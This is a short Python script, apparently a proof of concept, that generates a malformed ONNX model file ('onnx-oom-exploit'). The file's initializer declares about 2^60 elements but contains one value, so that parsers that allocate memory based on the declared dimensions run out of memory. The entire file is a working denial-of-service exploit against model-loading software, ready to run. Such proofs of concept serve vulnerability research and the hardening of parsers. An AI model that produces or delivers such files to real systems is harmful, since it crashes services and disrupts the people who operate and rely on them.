File size: 1,321 Bytes
a551f75
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import onnx
from onnx import helper, TensorProto
import struct

def create_oom_onnx(output_path):
    print("[*] Creating ONNX model with huge initializer dimensions...")
    
    # We create an initializer with valid data but MALFORMED dimensions
    # so that the parser tries to allocate a huge buffer.
    
    # Valid small data
    raw_data = struct.pack("<f", 1.0)
    
    # Huge dimensions: 2^30 * 2^30 = 2^60 elements
    huge_dims = [1024*1024*1024, 1024*1024*1024]
    
    initializer = helper.make_tensor(
        name="huge_tensor",
        data_type=TensorProto.FLOAT,
        dims=huge_dims,
        vals=[1.0], # Logic in some parsers might try to allocate based on dims first
        raw=False
    )
    
    node_def = helper.make_node("Identity", ["huge_tensor"], ["output"])
    graph_def = helper.make_graph(
        [node_def], "oom-graph",
        [], # no inputs needed, using initializer
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])],
        initializer=[initializer]
    )
    
    model_def = helper.make_model(graph_def, producer_name="onnx-oom-exploit", opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)])
    onnx.save(model_def, output_path)
    print(f"[+] Model saved to {output_path}")

if __name__ == "__main__":
    create_oom_onnx("/tmp/oom.onnx")